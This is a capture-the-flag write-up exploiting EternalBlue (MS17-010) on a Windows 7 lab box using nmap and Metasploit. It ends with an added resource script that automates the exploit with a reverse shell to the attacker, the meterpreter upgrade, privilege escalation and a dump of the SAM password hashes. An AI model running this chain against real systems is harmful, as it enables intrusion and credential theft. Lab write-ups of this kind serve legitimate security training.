This is a very easy box built around the EternalBlue vulnerability (MS17-010, CVE-2017-0143). The first thing we do is an nmap scan to see which ports are open and which services are running.
The flags used in the nmap scan are: -sS for a SYN scan (needs root, so run nmap with sudo), -sV for service version detection, -O to identify the OS (also needs root), -T4 for a faster timing template, and --open (two dashes) to show only the open ports.
We notice the service running on port 445 is SMB, so we can use an nmap script to check whether the service is vulnerable to EternalBlue.
The flags used are: -p to scan only the given port (445 in our case) and --script smb-vuln-ms17-010, the NSE script to run against the target port. The scan output shows that the service is vulnerable to MS17-010.
MSFConsole already ships with this exploit, so let's fire it up. To find the exploit, type in the console:
    search eternalblue
I'll be using exploit/windows/smb/ms17_010_eternalblue since we know from the initial nmap scan that the target is running Windows 7. Let's configure the exploit. Type the following commands:
    use windows/smb/ms17_010_eternalblue
You can then type
    show options
(or just options) to see the available options. Set the IP of the vulnerable machine with:
    set RHOSTS IpOfTheMachine
To exploit the target, just type exploit or run at the msf prompt. You should get output similar to this:
Now press Enter and you'll be dropped into an OS shell (cmd.exe). One flag is in the Documents folder of the user Jon. To have more tools at hand, we'll upgrade the OS shell to a meterpreter shell. Background the session with CTRL+Z, then search for the shell_to_meterpreter post module (post/multi/manage/shell_to_meterpreter). Use that module, set SESSION to 1 (the ID of the shell session) and type exploit or run to upgrade the OS shell to a meterpreter shell. The upgrade opens a new meterpreter session (normally session 2), which you enter with sessions -i 2. To get NT AUTHORITY\SYSTEM (the most privileged local account) we can use the meterpreter command
    getsystem
which tries to escalate privileges for us automatically. Check with getuid first: the EternalBlue payload usually already runs as SYSTEM, in which case getsystem just reports that. The other flags are at the root of C:\ (flag1) and in C:\Windows\System32\config, which is the actual location of the SAM database. Note that the SAM file itself is locked while Windows is running, so to read the password hashes use the meterpreter hashdump command rather than trying to copy the file.
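The whole procedure above, from the MS17-010 check to the privilege check, as an added example in the form of a Metasploit resource script (this is not code from the original write-up). It assumes a placeholder target IP of 10.10.10.10, that the attacker's VPN interface is tun0, that the target is 64-bit Windows 7, and that the flag files are named flag*.txt; all of those are assumptions. The initial port scan is still run with nmap from a normal shell beforehand; inside msfconsole the vulnerability check is done with the auxiliary scanner module instead of the nmap NSE script, and -z on the exploit replaces the manual CTRL+Z so the script can keep going.

```text
# blue.rc - run with: msfconsole -q -r blue.rc
# Added example, not from the write-up. Placeholders: target 10.10.10.10, attacker interface tun0.
setg RHOSTS 10.10.10.10
setg LHOST tun0

# 1. Confirm MS17-010 from inside msfconsole (same check as nmap's smb-vuln-ms17-010)
use auxiliary/scanner/smb/smb_ms17_010
run

# 2. Exploit. The staged cmd.exe payload mirrors the OS shell the write-up gets;
#    -z means "do not interact with the session", so the script continues (no CTRL+Z needed).
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
exploit -z

# 3. Upgrade the OS shell (session 1) to meterpreter; the result arrives as a new session (2)
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# Wait up to 60 s for the meterpreter session before using it
<ruby>
60.times { break if framework.sessions.count >= 2; sleep 1 }
</ruby>

# 4. Who are we? EternalBlue payloads normally already run as SYSTEM; getsystem then just confirms it
sessions -C getuid -i 2
sessions -C getsystem -i 2

# 5. Locate the flags (assumed name pattern) and read the SAM hashes, since the SAM file is locked
sessions -C "search -d C:\\ -f flag*.txt" -i 2
sessions -C hashdump -i 2
```

When the script finishes, sessions -i 2 drops you into the meterpreter session to collect the flags by hand. Setting the payload to windows/x64/meterpreter/reverse_tcp in step 2 would give meterpreter directly and make step 3 unnecessary; the shell payload is kept here only to match the flow of the write-up.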